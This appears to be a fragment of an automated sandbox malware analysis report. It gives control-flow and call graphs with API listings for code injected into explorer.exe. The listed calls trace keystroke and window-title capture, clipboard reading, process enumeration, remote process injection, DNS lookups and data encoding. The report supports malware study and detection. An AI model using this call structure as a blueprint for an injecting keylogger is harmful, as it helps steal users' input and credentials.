                                                                                                                                                                                                              • Opcode Fuzzy Hash: 882c75d8f1e7804324d863d590c345fdfe5d5be8a53308ccae1a22d2186dc7e8
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 99A17C71A08305AFDB11EF68E885A2BBBE9FB88344F10492DF985D3252DB70D915CF52

                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                              control_flow_graph 366 27925ad-27925c9 OpenProcess 367 27925cb-27925da IsWow64Process 366->367 368 2792600-2792607 366->368 369 27925dc-27925ec IsWow64Process 367->369 370 27925f7 367->370 371 27925f9-27925fa CloseHandle 369->371 372 27925ee-27925f5 369->372 370->371 371->368 372->371
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • OpenProcess.KERNEL32(00000400,00000000,?,74DEE800,?,?,microsoftedgecp.exe,02791287), ref: 027925BF
                                                                                                                                                                                                              • IsWow64Process.KERNEL32(000000FF,?), ref: 027925D1
                                                                                                                                                                                                              • IsWow64Process.KERNEL32(00000000,?), ref: 027925E4
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 027925FA
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000016.00000002.2893384423.0000000002791000.00000040.80000000.00040000.00000000.sdmp, Offset: 02791000, based on PE: false
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_22_2_2791000_explorer.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Process$Wow64$CloseHandleOpen
                                                                                                                                                                                                              • String ID: microsoftedgecp.exe
                                                                                                                                                                                                              • API String ID: 331459951-1475183003
                                                                                                                                                                                                              • Opcode ID: d29f6b0ec9dd3731fa851f2e67c8ba2d2a9d0d4271604d7596235b7fa6bea234
                                                                                                                                                                                                              • Instruction ID: aedbd757c0f3f558c631c6c36acb0aa822e885a654a93624b1eea9cfbea9e099
                                                                                                                                                                                                              • Opcode Fuzzy Hash: d29f6b0ec9dd3731fa851f2e67c8ba2d2a9d0d4271604d7596235b7fa6bea234
                                                                                                                                                                                                              • Instruction Fuzzy Hash: BBF09071D82328FF9B10DF95AD999EE776CEB01255B1442AAFD0492240D7314E15E6A0

                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                              control_flow_graph 421 2791b17-2791b2c 422 2791b2e 421->422 423 2791b60-2791b68 421->423 426 2791b30-2791b5e RtlMoveMemory 422->426 424 2791b6a-2791b6f 423->424 425 2791bc3-2791bcb 423->425 427 2791bbe-2791bc1 424->427 428 2791c0b 425->428 429 2791bcd-2791bdf 425->429 426->423 426->426 427->425 431 2791b71-2791b84 LoadLibraryA 427->431 430 2791c0d-2791c12 428->430 429->428 432 2791be1-2791bfe LdrProcessRelocationBlock 429->432 433 2791b8a-2791b8f 431->433 434 2791c15-2791c17 431->434 432->428 435 2791c00-2791c04 432->435 436 2791bb6-2791bb9 433->436 434->430 435->428 437 2791c06-2791c09 435->437 438 2791bbb 436->438 439 2791b91-2791b95 436->439 437->428 437->432 438->427 440 2791b9c-2791b9f 439->440 441 2791b97-2791b9a 439->441 442 2791ba1-2791bab GetProcAddress 440->442 441->442 442->434 443 2791bad-2791bb3 442->443 443->436
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • RtlMoveMemory.NTDLL(?,?,?), ref: 02791B4E
                                                                                                                                                                                                              • LoadLibraryA.KERNEL32(?,02794434,00000000,00000000,74DF2EE0,00000000,02791910,?,?,?,00000001,?,00000000), ref: 02791B76
                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,-00000002), ref: 02791BA3
                                                                                                                                                                                                              • LdrProcessRelocationBlock.NTDLL(?,?,00000008,?), ref: 02791BF4
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000016.00000002.2893384423.0000000002791000.00000040.80000000.00040000.00000000.sdmp, Offset: 02791000, based on PE: false
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_22_2_2791000_explorer.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: AddressBlockLibraryLoadMemoryMoveProcProcessRelocation
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 3827878703-0
                                                                                                                                                                                                              • Opcode ID: c944f0535cd273954312614b0f7d895358bc93a23e8c59d0421a8c7373f9103b
                                                                                                                                                                                                              • Instruction ID: 9d9cd06fa01eef69e37cfd190e659f3d7c2b16a400ab801bbf18d345b3fb5000
                                                                                                                                                                                                              • Opcode Fuzzy Hash: c944f0535cd273954312614b0f7d895358bc93a23e8c59d0421a8c7373f9103b
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 0131A175701302ABCF24CF2DD884B76B7E9EF05319B84456DE88AC7600E731E866CBA0

                                                                                                                                                                                                              Execution Graph

                                                                                                                                                                                                              Execution Coverage:8.8%
                                                                                                                                                                                                              Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                              Signature Coverage:0%
                                                                                                                                                                                                              Total number of Nodes:9
                                                                                                                                                                                                              Total number of Limit Nodes:2
                                                                                                                                                                                                              execution_graph 765 5d9fab 766 5d9fd8 765->766 768 5d9ff8 765->768 769 5da048 766->769 773 5da04d 769->773 770 5da135 LoadLibraryA 770->773 771 5da190 VirtualProtect VirtualProtect 772 5da1e8 771->772 772->772 773->770 773->771 774 5da185 773->774 774->768

                                                                                                                                                                                                              Callgraph

                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                              • Opacity -> Relevance
                                                                                                                                                                                                              • Disassembly available
                                                                                                                                                                                                              callgraph 0 Function_005D355C 0->0 20 Function_005D30F0 0->20 23 Function_005D1B70 0->23 47 Function_005D1838 0->47 56 Function_005D3220 0->56 1 Function_005D4059 2 Function_005D1C58 3 Function_005DB0D5 4 Function_005D1254 5 Function_005D14D4 6 Function_005D1DD4 6->47 7 Function_005D2054 9 Function_005D18D0 7->9 13 Function_005D1F40 7->13 16 Function_005D18F8 7->16 22 Function_005D1E70 7->22 27 Function_005D1860 7->27 34 Function_005D2010 7->34 35 Function_005D188C 7->35 7->47 48 Function_005D1938 7->48 8 Function_005D1D50 8->47 10 Function_005DA048 42 Function_005DA00A 10->42 11 Function_005D25C4 14 Function_005D25FC 11->14 12 Function_005D4A41 13->16 13->47 15 Function_005D14F9 17 Function_005D2774 18 Function_005D2BF4 19 Function_005D1576 20->2 20->27 37 Function_005D1A88 20->37 39 Function_005D2508 20->39 20->47 21 Function_005D2B70 44 Function_005D1A04 21->44 21->47 24 Function_005D156C 25 Function_005D18E8 26 Function_005D24E0 27->23 28 Function_005D1560 29 Function_005D2860 29->17 29->23 57 Function_005D2620 29->57 30 Function_005D141D 31 Function_005D2418 31->7 31->27 31->47 32 Function_005D2E98 32->6 32->18 32->21 40 Function_005D2E08 32->40 32->44 49 Function_005D2CB8 32->49 33 Function_005DB115 34->44 35->47 36 Function_005D1508 38 Function_005D1C08 39->9 39->11 39->26 40->8 40->25 40->27 40->31 41 Function_005D3088 41->23 41->32 43 Function_005D1405 45 Function_005D1000 46 Function_005D2E80 49->27 49->47 58 Function_005D1D20 49->58 50 Function_005D1BB0 51 Function_005D14B2 52 Function_005D1C28 53 Function_005D9FAB 53->10 54 Function_005D45A7 55 Function_005D41A1 56->23 56->29 56->38 56->47 56->48 56->50 56->52 59 Function_005D3020 59->23 59->32 60 Function_005D1822

                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                              control_flow_graph 119 5d355c-5d356c call 5d1b70 122 5d35fc-5d3601 119->122 123 5d3572-5d35a5 call 5d1838 119->123 127 5d35a7 call 5d1838 123->127 128 5d35d1-5d35f6 NtUnmapViewOfSection 123->128 130 5d35ac-5d35c5 127->130 132 5d3608-5d3617 call 5d3220 128->132 133 5d35f8-5d35fa 128->133 130->128 139 5d3619-5d361c call 5d355c 132->139 140 5d3621-5d362a 132->140 133->122 135 5d3602-5d3607 call 5d30f0 133->135 135->132 139->140
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • NtUnmapViewOfSection.NTDLL ref: 005D35D8
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000001A.00000002.2892796077.00000000005D1000.00000040.80000000.00040000.00000000.sdmp, Offset: 005D1000, based on PE: false
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_26_2_5d1000_explorer.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: SectionUnmapView
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 498011366-0
                                                                                                                                                                                                              • Opcode ID: 105ce7ebc966886b9a25723169f2257f301d4275c672492e635fc8e478682f43
                                                                                                                                                                                                              • Instruction ID: f58a9656c0157aa5fe8d599ab967257ba381eb3d61cd2b4ba829cda0502b64ab
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 105ce7ebc966886b9a25723169f2257f301d4275c672492e635fc8e478682f43
                                                                                                                                                                                                              • Instruction Fuzzy Hash: C9118230715E095BEB68FBBCA89D2793BA0FB54302F54012BA419C67A1DA398A40C702

                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                              control_flow_graph 0 5d3220-5d325b call 5d1838 3 5d3261-5d3273 CreateToolhelp32Snapshot 0->3 4 5d3549-5d3554 SleepEx 3->4 5 5d3279-5d328f Process32First 3->5 4->3 6 5d3538-5d353a 5->6 7 5d3294-5d32ac 6->7 8 5d3540-5d3543 CloseHandle 6->8 10 5d348c-5d3495 call 5d1bb0 7->10 11 5d32b2-5d32c6 7->11 8->4 15 5d349b-5d34a4 call 5d1c08 10->15 16 5d352a-5d3532 Process32Next 10->16 11->10 17 5d32cc-5d32e0 11->17 15->16 22 5d34aa-5d34b1 call 5d1c28 15->22 16->6 17->10 21 5d32e6-5d32fa 17->21 21->10 26 5d3300-5d3314 21->26 22->16 27 5d34b3-5d34c1 call 5d1b70 22->27 26->10 32 5d331a-5d332e 26->32 27->16 31 5d34c3-5d3525 call 5d1938 call 5d2860 call 5d1938 27->31 31->16 32->10 36 5d3334-5d3348 32->36 36->10 41 5d334e-5d3362 36->41 41->10 44 5d3368-5d337c 41->44 44->10 46 5d3382-5d3396 44->46 46->10 48 5d339c-5d33b0 46->48 48->10 50 5d33b6-5d33ca 48->50 50->10 52 5d33d0-5d33e4 50->52 52->10 54 5d33ea-5d33fe 52->54 54->10 56 5d3404-5d3418 54->56 56->10 58 5d341a-5d342e 56->58 58->10 60 5d3430-5d3444 58->60 60->10 62 5d3446-5d345a 60->62 62->10 64 5d345c-5d3470 62->64 64->10 66 5d3472-5d3486 64->66 66->10 66->16
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000001A.00000002.2892796077.00000000005D1000.00000040.80000000.00040000.00000000.sdmp, Offset: 005D1000, based on PE: false
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_26_2_5d1000_explorer.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Process32$CloseCreateFirstHandleNextSleepSnapshotToolhelp32
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 2482764027-0
                                                                                                                                                                                                              • Opcode ID: dd7379c30c01fbe83c455f487028ed93214d04d4b8b4672215a43173641bdad8
                                                                                                                                                                                                              • Instruction ID: e8027f5558bea5a55daf24c1dca6770b606d2267751689c34a5abc2339cc0490
                                                                                                                                                                                                              • Opcode Fuzzy Hash: dd7379c30c01fbe83c455f487028ed93214d04d4b8b4672215a43173641bdad8
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 028125312186098FEB16DF58ED58BEABBA1FB91741F54461BD443C7160EF78DA04CB82

                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                              control_flow_graph 68 5da048-5da04b 69 5da055-5da059 68->69 70 5da05b-5da063 69->70 71 5da065 69->71 70->71 72 5da04d-5da053 71->72 73 5da067 71->73 72->69 74 5da06a-5da071 73->74 76 5da07d 74->76 77 5da073-5da07b 74->77 76->74 78 5da07f-5da082 76->78 77->76 79 5da084-5da092 78->79 80 5da097-5da0a4 78->80 81 5da0ce-5da0e9 79->81 82 5da094-5da095 79->82 92 5da0be-5da0cc call 5da00a 80->92 93 5da0a6-5da0a8 80->93 83 5da11a-5da11d 81->83 82->80 85 5da11f-5da120 83->85 86 5da122-5da129 83->86 88 5da101-5da105 85->88 89 5da12f-5da133 86->89 94 5da0eb-5da0ee 88->94 95 5da107-5da10a 88->95 90 5da135-5da14e LoadLibraryA 89->90 91 5da190-5da1e4 VirtualProtect * 2 89->91 97 5da14f-5da156 90->97 101 5da1e8-5da1ed 91->101 92->69 99 5da0ab-5da0b2 93->99 94->86 98 5da0f0 94->98 95->86 100 5da10c-5da110 95->100 97->89 103 5da158 97->103 104 5da0f1-5da0f5 98->104 114 5da0bc 99->114 115 5da0b4-5da0ba 99->115 100->104 105 5da112-5da119 100->105 101->101 106 5da1ef-5da1fe 101->106 107 5da15a-5da162 103->107 108 5da164-5da16c 103->108 104->88 109 5da0f7-5da0f9 104->109 105->83 112 5da16e-5da17a 107->112 108->112 109->88 113 5da0fb-5da0ff 109->113 117 5da17c-5da183 112->117 118 5da185-5da18f 112->118 113->88 113->95 114->92 114->99 115->114 117->97
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • LoadLibraryA.KERNELBASE ref: 005DA147
                                                                                                                                                                                                              • VirtualProtect.KERNELBASE(?,?,?,?,?,?,?,-0000000E), ref: 005DA1BB
                                                                                                                                                                                                              • VirtualProtect.KERNELBASE ref: 005DA1D9
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000001A.00000002.2892796077.00000000005D7000.00000040.80000000.00040000.00000000.sdmp, Offset: 005D7000, based on PE: false
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_26_2_5d7000_explorer.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: ProtectVirtual$LibraryLoad
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 895956442-0
                                                                                                                                                                                                              • Opcode ID: 9471cbd89cfacdc20873a06991d91791c754b160c08a2600c3720216ed5fc549
                                                                                                                                                                                                              • Instruction ID: 89f78b0eacbfa52555f3255c5befe1efebd0d1a7a564f3397b5f3b41862121d1
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 9471cbd89cfacdc20873a06991d91791c754b160c08a2600c3720216ed5fc549
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 7C517B3235891D4BCB34AA7C9CC86B6BBC1F755325F580B2BD48AC3385E659D886C383

                                                                                                                                                                                                              Execution Graph

                                                                                                                                                                                                              Execution Coverage:15.1%
                                                                                                                                                                                                              Dynamic/Decrypted Code Coverage:97.6%
                                                                                                                                                                                                              Signature Coverage:18.6%
                                                                                                                                                                                                              Total number of Nodes:328
                                                                                                                                                                                                              Total number of Limit Nodes:7
                                                                                                                                                                                                              execution_graph 1023 279162b 1024 279163c 1023->1024 1025 27916aa 1023->1025 1024->1025 1026 279164b GetKeyboardState 1024->1026 1026->1025 1027 279165c ToUnicode 1026->1027 1028 2791684 1027->1028 1028->1025 1030 27916b9 RtlEnterCriticalSection 1028->1030 1031 27917ce RtlLeaveCriticalSection 1030->1031 1032 27916d2 lstrlenW 1030->1032 1031->1025 1033 27916ed lstrlenW 1032->1033 1048 27917bd 1032->1048 1034 2791702 1033->1034 1035 279174e GetForegroundWindow 1034->1035 1036 2791723 1034->1036 1037 279175a GetWindowTextW 1035->1037 1035->1048 1036->1048 1049 27917dc 1036->1049 1039 279177a lstrcmpW 1037->1039 1040 2791771 GetClassNameW 1037->1040 1042 279178b lstrcpyW 1039->1042 1043 27917bf lstrcatW 1039->1043 1040->1039 1041 279172f wsprintfW 1044 27917b6 1041->1044 1045 27917dc 4 API calls 1042->1045 1043->1048 1046 27929eb 3 API calls 1044->1046 1047 2791798 wsprintfW 1045->1047 1046->1048 1047->1044 1048->1031 1052 2792a09 GetProcessHeap RtlAllocateHeap 1049->1052 1051 27917ed GetLocalTime wsprintfW 1051->1041 1052->1051 770 27929bd VirtualAlloc 1053 279182d 1054 2791838 RtlEnterCriticalSection lstrlenW 1053->1054 1055 27918a8 RtlLeaveCriticalSection Sleep 1054->1055 1061 2791854 1054->1061 1055->1054 1058 27929eb VirtualQuery GetProcessHeap HeapFree 1058->1061 1061->1055 1061->1058 1062 27925a4 1061->1062 1068 279200d 1061->1068 1079 27929ae VirtualFree 1061->1079 1080 2792a09 GetProcessHeap RtlAllocateHeap 1061->1080 1063 27925b9 CryptBinaryToStringA 1062->1063 1064 27925e8 1062->1064 1063->1064 1065 27925cc 1063->1065 1064->1061 1081 2792a09 GetProcessHeap RtlAllocateHeap 1065->1081 1067 27925d7 CryptBinaryToStringA 1067->1064 1069 2792030 1068->1069 1070 2792023 lstrlen 1068->1070 1082 2792a09 GetProcessHeap RtlAllocateHeap 1069->1082 1070->1069 1072 2792038 lstrcat 1073 279206d lstrcat 1072->1073 1074 2792074 1072->1074 1073->1074 1083 27920a1 1074->1083 1077 27929eb 3 API calls 1078 2792097 1077->1078 1078->1061 1079->1061 1080->1061 1081->1067 1082->1072 1117 279240f 1083->1117 1087 27920ce 1122 279298a lstrlen MultiByteToWideChar 1087->1122 1089 27920dd 1123 27924cc RtlZeroMemory 1089->1123 1092 279212f RtlZeroMemory 1095 2792164 1092->1095 1093 27929eb 3 API calls 1094 2792084 1093->1094 1094->1077 1098 27923f1 1095->1098 1100 2792192 1095->1100 1125 279243d 1095->1125 1097 27923d7 1097->1098 1099 27929eb 3 API calls 1097->1099 1098->1093 1099->1098 1100->1097 1134 2792a09 GetProcessHeap RtlAllocateHeap 1100->1134 1102 2792262 wsprintfW 1103 2792288 1102->1103 1106 27922f5 1103->1106 1135 2792a09 GetProcessHeap RtlAllocateHeap 1103->1135 1105 27922c2 wsprintfW 1105->1106 1116 27923b4 1106->1116 1136 2792a09 GetProcessHeap RtlAllocateHeap 1106->1136 1107 27929eb 3 API calls 1108 27923c8 1107->1108 1108->1097 1110 27929eb 3 API calls 1108->1110 1110->1097 1111 27923ad 1114 27929eb 3 API calls 1111->1114 1112 2792340 1112->1111 1137 27929bd VirtualAlloc 1112->1137 1114->1116 1115 279239a RtlMoveMemory 1115->1111 1116->1107 1118 2792419 1117->1118 1120 27920c0 1117->1120 1119 2792841 2 API calls 1118->1119 1119->1120 1121 2792a09 GetProcessHeap RtlAllocateHeap 1120->1121 1121->1087 1122->1089 1124 27920ed 1123->1124 1124->1092 1124->1098 1127 279244a 1125->1127 1128 27924ab 1125->1128 1126 279244e DnsQuery_W 1126->1127 1127->1126 1127->1128 1129 279248d DnsFree inet_ntoa 1127->1129 1128->1100 1129->1127 1130 27924ad 1129->1130 1138 2792a09 GetProcessHeap RtlAllocateHeap 1130->1138 1132 27924b7 1139 279298a lstrlen MultiByteToWideChar 1132->1139 1134->1102 1135->1105 1136->1112 1137->1115 1138->1132 1139->1128 771 27929ae VirtualFree 1140 2791581 1141 279158e 1140->1141 1142 2791623 1141->1142 1143 27915a7 GlobalLock 1141->1143 1143->1142 1144 27915b5 1143->1144 1145 27915e4 1144->1145 1146 27915c0 1144->1146 1161 279293e 1145->1161 1148 27915c5 lstrlenW 1146->1148 1149 27915f2 1146->1149 1160 2792a09 GetProcessHeap RtlAllocateHeap 1148->1160 1151 2792724 VirtualQuery 1149->1151 1153 27915fb 1151->1153 1152 27915d8 lstrcatW 1152->1149 1154 279161b GlobalUnlock 1153->1154 1155 27915ff lstrlenW 1153->1155 1154->1142 1155->1154 1156 279160a 1155->1156 1157 27916b9 19 API calls 1156->1157 1158 2791614 1157->1158 1159 27929eb 3 API calls 1158->1159 1159->1154 1160->1152 1162 279294d lstrlen 1161->1162 1163 2792982 1161->1163 1168 2792a09 GetProcessHeap RtlAllocateHeap 1162->1168 1163->1149 1165 2792963 MultiByteToWideChar 1165->1163 1166 279297b 1165->1166 1167 27929eb 3 API calls 1166->1167 1167->1163 1168->1165 772 2799ae0 773 2799ca4 772->773 774 2799aeb 772->774 773->773 775 2799bfa LoadLibraryA 774->775 779 2799c3f VirtualProtect VirtualProtect 774->779 776 2799c11 775->776 776->774 778 2799c23 GetProcAddress 776->778 778->776 780 2799c39 778->780 779->773 781 2791000 782 2791010 781->782 783 2791007 781->783 785 2791016 783->785 827 2792724 VirtualQuery 785->827 788 2791098 788->782 790 279102c RtlMoveMemory 791 279104d 790->791 792 2791072 NtUnmapViewOfSection GetCurrentProcessId 790->792 857 2792a09 GetProcessHeap RtlAllocateHeap 791->857 794 279109f 792->794 795 2791093 792->795 830 27910a5 794->830 795->788 798 2791096 795->798 797 2791053 RtlMoveMemory 797->792 858 27913ae RtlZeroMemory VirtualQuery 798->858 799 27910a4 801 2792a09 GetProcessHeap RtlAllocateHeap 799->801 802 27910bf 801->802 803 2792a09 GetProcessHeap RtlAllocateHeap 802->803 804 27910cc wsprintfA 803->804 809 27910f3 804->809 805 279276d OpenFileMappingA MapViewOfFile 805->809 806 279129a Sleep 806->809 807 2792841 lstrlen lstrlen 807->809 808 279275a UnmapViewOfFile CloseHandle 808->806 809->805 809->806 809->807 810 2792a09 GetProcessHeap RtlAllocateHeap 809->810 813 2791285 809->813 811 2791150 RtlMoveMemory CreateToolhelp32Snapshot 810->811 812 2791171 Process32First 811->812 811->813 815 279118d 812->815 816 279127e CloseHandle 812->816 813->808 814 27929eb VirtualQuery GetProcessHeap HeapFree 813->814 814->813 817 2791190 CharLowerA 815->817 816->813 818 27911ab lstrcmpiA 817->818 819 2791266 Process32Next 817->819 818->819 820 27911c3 818->820 819->817 819->820 820->816 820->819 821 27912ae 16 API calls 820->821 826 27911d6 820->826 821->820 822 27926c9 OpenProcess IsWow64Process IsWow64Process CloseHandle 822->826 823 2792724 VirtualQuery 823->826 824 2791208 lstrcmpiA 824->826 825 27918bf 30 API calls 825->826 826->819 826->822 826->823 826->824 826->825 828 279101e 827->828 828->788 829 2792a09 GetProcessHeap RtlAllocateHeap 828->829 829->790 887 2792a09 GetProcessHeap RtlAllocateHeap 830->887 832 27910bf 888 2792a09 GetProcessHeap RtlAllocateHeap 832->888 834 27910cc wsprintfA 839 27910f3 834->839 836 279129a Sleep 836->839 837 2792841 lstrlen lstrlen 837->839 839->836 839->837 843 2791285 839->843 889 279276d OpenFileMappingA 839->889 892 2792a09 GetProcessHeap RtlAllocateHeap 839->892 841 2791150 RtlMoveMemory CreateToolhelp32Snapshot 842 2791171 Process32First 841->842 841->843 845 279118d 842->845 846 279127e CloseHandle 842->846 949 27929eb 843->949 954 279275a UnmapViewOfFile CloseHandle 843->954 847 2791190 CharLowerA 845->847 846->843 848 27911ab lstrcmpiA 847->848 849 2791266 Process32Next 847->849 848->849 850 27911c3 848->850 849->847 849->850 850->846 850->849 856 27911d6 850->856 893 27912ae 850->893 853 2792724 VirtualQuery 853->856 854 2791208 lstrcmpiA 854->856 856->849 856->853 856->854 912 27926c9 OpenProcess 856->912 918 27918bf 856->918 857->797 859 27913e4 858->859 979 2792a09 GetProcessHeap RtlAllocateHeap 859->979 861 2791402 GetModuleFileNameA 980 2792a09 GetProcessHeap RtlAllocateHeap 861->980 863 2791418 GetCurrentProcessId wsprintfA 981 2792799 CryptAcquireContextA 863->981 866 279151b 868 27929eb 3 API calls 866->868 867 279145f RtlInitializeCriticalSection 986 2792a09 GetProcessHeap RtlAllocateHeap 867->986 870 2791522 868->870 872 27929eb 3 API calls 870->872 871 279147f Sleep 987 27925f1 GetCurrentProcessId GetCurrentThreadId CreateToolhelp32Snapshot Thread32First 871->987 874 2791529 RtlExitUserThread 872->874 884 2791533 874->884 875 2791496 GetModuleHandleA GetProcAddress 876 27914b5 875->876 877 27914c6 GetModuleHandleA GetProcAddress 875->877 995 2791f3a 876->995 879 27914d9 877->879 880 27914ea GetModuleHandleA 877->880 881 2791f3a 3 API calls 879->881 1005 2791e89 880->1005 881->880 884->794 885 27925f1 10 API calls 886 2791501 CreateThread CloseHandle 885->886 886->866 887->832 888->834 890 2792781 MapViewOfFile 889->890 891 2792794 889->891 890->891 891->839 892->841 894 27912c5 893->894 907 27913a4 893->907 894->907 955 27929bd VirtualAlloc 894->955 896 27912d9 lstrlen 956 2792a09 GetProcessHeap RtlAllocateHeap 896->956 898 27929eb 3 API calls 906 2791375 898->906 901 2791329 RtlMoveMemory 959 2792569 901->959 902 2791353 RtlMoveMemory 905 2792569 2 API calls 902->905 909 2791351 905->909 910 2791388 PathMatchSpecA 906->910 911 2791399 906->911 907->850 908 27912f0 908->909 957 2792841 lstrlen lstrlen 908->957 909->898 910->906 910->911 963 27929ae VirtualFree 911->963 913 279271c 912->913 914 27926e7 IsWow64Process 912->914 913->856 915 27926f8 IsWow64Process 914->915 917 279270a 914->917 916 2792715 CloseHandle 915->916 915->917 916->913 917->916 919 2792724 VirtualQuery 918->919 920 27918d9 919->920 921 27918eb OpenProcess 920->921 922 2791b1c 920->922 921->922 923 2791904 921->923 922->856 924 2792724 VirtualQuery 923->924 925 279190b 924->925 925->922 926 2791919 NtSetInformationProcess 925->926 927 2791935 925->927 926->927 964 2791b26 927->964 930 2791b26 2 API calls 931 279197c 930->931 932 2791b19 CloseHandle 931->932 933 2791b26 2 API calls 931->933 932->922 934 27919a6 933->934 970 2791bbd 934->970 937 2791b26 2 API calls 938 27919d6 RtlMoveMemory RtlMoveMemory NtUnmapViewOfSection 937->938 939 2791a2b 938->939 940 2791af4 CreateRemoteThread 938->940 941 2791a31 CreateMutexA GetLastError 939->941 945 2791a61 GetModuleHandleA GetProcAddress ReadProcessMemory 939->945 942 2791b0b CloseHandle 940->942 941->939 943 2791a4d CloseHandle Sleep 941->943 944 2791b0d CloseHandle CloseHandle 942->944 943->941 944->932 946 2791aed 945->946 947 2791a92 WriteProcessMemory 945->947 946->942 946->944 947->946 948 2791abc CreateRemoteThread CloseHandle Sleep WriteProcessMemory 947->948 948->946 950 2792724 VirtualQuery 949->950 951 27929f3 950->951 952 2792a07 951->952 953 27929f7 GetProcessHeap HeapFree 951->953 952->843 953->952 954->836 955->896 956->908 958 279130c RtlZeroMemory 957->958 958->901 958->902 960 27925a1 959->960 961 2792577 lstrlen RtlMoveMemory 959->961 960->908 961->960 963->907 965 2791b3a 964->965 966 279195a 964->966 967 2791b4a NtCreateSection 965->967 968 2791b69 965->968 966->930 967->968 968->966 969 2791b7e NtMapViewOfSection 968->969 969->966 971 2791bd4 970->971 972 2791c06 970->972 973 2791bd6 RtlMoveMemory 971->973 974 2791c17 LoadLibraryA 972->974 976 2791c69 972->976 978 2791c47 GetProcAddress 972->978 973->972 973->973 974->972 977 27919b6 NtUnmapViewOfSection 974->977 975 2791c87 LdrProcessRelocationBlock 975->976 975->977 976->975 976->977 977->937 978->972 978->977 979->861 980->863 982 2791445 CreateMutexA GetLastError 981->982 983 27927bf CryptCreateHash lstrlen CryptHashData CryptGetHashParam 981->983 982->866 982->867 984 2792805 wsprintfA 983->984 984->984 985 2792827 CryptDestroyHash CryptReleaseContext 984->985 985->982 986->871 988 2792631 987->988 989 2792681 CloseHandle 988->989 990 2792671 Thread32Next 988->990 991 279263d OpenThread 988->991 989->875 990->988 992 2792658 SuspendThread 991->992 993 2792660 ResumeThread 991->993 994 2792666 CloseHandle 992->994 993->994 994->990 996 2791fad 995->996 997 2791f44 995->997 996->877 997->996 1014 2791fea VirtualProtect 997->1014 999 2791f5b 999->996 1015 27929bd VirtualAlloc 999->1015 1001 2791f67 1002 2791f71 RtlMoveMemory 1001->1002 1003 2791f84 1001->1003 1002->1003 1016 2791fea VirtualProtect 1003->1016 1006 2792724 VirtualQuery 1005->1006 1007 2791e93 1006->1007 1008 27914fa 1007->1008 1017 2791ed8 1007->1017 1008->885 1012 2791eba 1012->1008 1022 2791fea VirtualProtect 1012->1022 1014->999 1015->1001 1016->996 1018 2791eea 1017->1018 1020 2791e9e 1017->1020 1019 2791f04 lstrcmp 1018->1019 1018->1020 1019->1018 1019->1020 1020->1008 1021 2791fea VirtualProtect 1020->1021 1021->1012 1022->1008

                                                                                                                                                                                                              Callgraph

                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                              • Opacity -> Relevance
                                                                                                                                                                                                              • Disassembly available
